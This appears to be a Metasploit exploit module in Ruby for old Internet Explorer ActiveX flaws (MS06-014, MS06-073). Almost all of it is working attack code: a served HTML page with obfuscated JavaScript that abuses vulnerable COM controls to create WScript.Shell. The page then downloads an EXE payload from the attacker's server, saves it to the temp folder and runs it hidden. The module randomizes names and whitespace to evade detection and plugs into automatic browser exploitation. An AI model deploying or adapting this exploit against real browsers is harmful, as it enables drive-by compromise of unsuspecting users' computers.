269 lines
7.7 KiB
Ruby
269 lines
7.7 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
include Msf::Exploit::Seh
|
|
include Msf::Exploit::EXE
|
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
autopwn_info({
|
|
:ua_name => HttpClients::IE,
|
|
# In badly misconfigured situations, IE7 and 8 could be vulnerable to
|
|
# this, but by default they throw an ugly popup that stops all script
|
|
# execution until the user deals with it and aborts everything if they
|
|
# click "no". Not worth the risk of being unable to try more recent
|
|
# exploits. Make sure service packs on top of 6.0 are considered less
|
|
# than the max by setting to 6.1 (which doesn't really exist).
|
|
:ua_maxver => "6.1",
|
|
:javascript => true,
|
|
:os_name => OperatingSystems::WINDOWS,
|
|
:method => [ 'CreateObject', 'GetObject' ],
|
|
:classid =>
|
|
[
|
|
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
|
|
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
|
|
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
|
|
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
|
|
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
|
|
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
|
|
'{639F725F-1B2D-4831-A9FD-874847682010}',
|
|
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
|
|
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
|
|
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
|
|
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
|
|
'{0006F033-0000-0000-C000-000000000046}',
|
|
'{0006F03A-0000-0000-C000-000000000046}',
|
|
],
|
|
#:rank => ExcellentRanking # reliable exe writer
|
|
})
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Internet Explorer COM CreateObject Code Execution',
|
|
'Description' => %q{
|
|
This module exploits a generic code execution vulnerability in Internet
|
|
Explorer by abusing vulnerable ActiveX objects.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'hdm',
|
|
],
|
|
'References' =>
|
|
[
|
|
# MDAC
|
|
[ 'MSB', 'MS06-014' ],
|
|
[ 'CVE', '2006-0003' ],
|
|
[ 'OSVDB', '24517' ],
|
|
# WMI Object Broker
|
|
[ 'MSB', 'MS06-073' ],
|
|
[ 'CVE', '2006-4704' ],
|
|
[ 'OSVDB', '30155' ],
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'Space' => 2048,
|
|
'StackAdjustment' => -3500,
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Automatic', { } ],
|
|
|
|
# Patched
|
|
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
|
|
# Found in mpack
|
|
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],
|
|
|
|
# Patched
|
|
[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],
|
|
|
|
# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
|
|
[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
|
|
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],
|
|
|
|
# Visual Studio components, not marked as safe
|
|
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
|
|
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
|
|
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
|
|
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
|
|
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
|
|
|
|
#
|
|
# The controls below can launch the "installing component" dialogs...
|
|
#
|
|
|
|
# Not marked as safe
|
|
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
|
|
|
|
# Not marked as safe
|
|
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
|
|
|
|
# Found exploitable in the wild (no details)
|
|
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
|
|
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Apr 11 2006'))
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
if (request.uri.match(/payload/))
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
|
data = generate_payload_exe({ :code => p.encoded })
|
|
print_status("Sending EXE payload")
|
|
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
|
return
|
|
end
|
|
|
|
# Build out the HTML response page
|
|
var_html = rand_text_alpha(rand(30)+2)
|
|
var_func_exploit = rand_text_alpha(rand(30)+2);
|
|
var_func_go = rand_text_alpha(rand(30)+2);
|
|
var_func_createo = rand_text_alpha(rand(30)+2);
|
|
var_exe_name = rand_text_alpha(rand(30)+2);
|
|
var_objects = ''
|
|
|
|
# Build the object list based on target selection
|
|
if (target.name == 'Automatic')
|
|
targets.each do |t|
|
|
next if not t['CLSID']
|
|
var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
|
|
end
|
|
else
|
|
var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
|
|
end
|
|
|
|
|
|
content = %Q^
|
|
<html><head><title></title>
|
|
<script language="javascript">
|
|
|
|
function #{var_func_createo}( o , n ) {
|
|
var r = null;
|
|
|
|
try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}
|
|
|
|
if (! r) {
|
|
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
|
|
}
|
|
|
|
if (! r) {
|
|
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
|
|
}
|
|
|
|
if (! r) {
|
|
try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
|
|
}
|
|
|
|
if (! r) {
|
|
try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
|
|
}
|
|
|
|
if (! r) {
|
|
try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
|
|
}
|
|
|
|
return( r );
|
|
}
|
|
|
|
function #{var_func_go}( a ) {
|
|
|
|
var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );
|
|
|
|
var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );
|
|
|
|
var e = s.Environment( "P" + "ro" + "ce" + "ss" );
|
|
|
|
|
|
var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
|
|
var xml = null;
|
|
var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
|
|
var dat;
|
|
|
|
try { xml=new XMLHttpRequest(); }
|
|
catch(e) {
|
|
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
|
|
catch(e) {
|
|
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
|
|
}
|
|
}
|
|
|
|
if (! xml) {
|
|
return(0);
|
|
}
|
|
|
|
xml.open("GET", url, false);
|
|
xml.send(null);
|
|
dat = xml.responseBody;
|
|
|
|
o.Type = 1 ;
|
|
o.Mode = 3 ;
|
|
o.Open ( ) ;
|
|
o.Write ( dat ) ;
|
|
o.SaveToFile ( bin, 2) ;
|
|
|
|
s.Run ( bin , 0 );
|
|
}
|
|
|
|
function #{var_func_exploit}( ) {
|
|
var i = 0;
|
|
var t = new Array( #{var_objects} null );
|
|
|
|
while (t[i]) {
|
|
var a = null;
|
|
|
|
if (t[i].substring(0,1) == '{') {
|
|
a = document.createElement("object");
|
|
a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
|
|
} else {
|
|
try { a = new ActiveXObject(t[i]); } catch(e){}
|
|
}
|
|
|
|
if (a) {
|
|
try {
|
|
var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
|
|
if (b) {
|
|
#{var_func_go}( a ) ;
|
|
return(0) ;
|
|
}
|
|
} catch(e){
|
|
}
|
|
}
|
|
i++;
|
|
}
|
|
}
|
|
</script>
|
|
</head>
|
|
<body onload='#{var_func_exploit}()'>
|
|
#{var_html}
|
|
</body>
|
|
</html>
|
|
|
|
^
|
|
|
|
|
|
content = Rex::Text.randomize_space(content)
|
|
|
|
print_status("Sending exploit HTML...")
|
|
|
|
|
|
# Transmit the response to the client
|
|
send_response_html(cli, content)
|
|
|
|
# Handle the payload
|
|
handler(cli)
|
|
end
|
|
|
|
end
|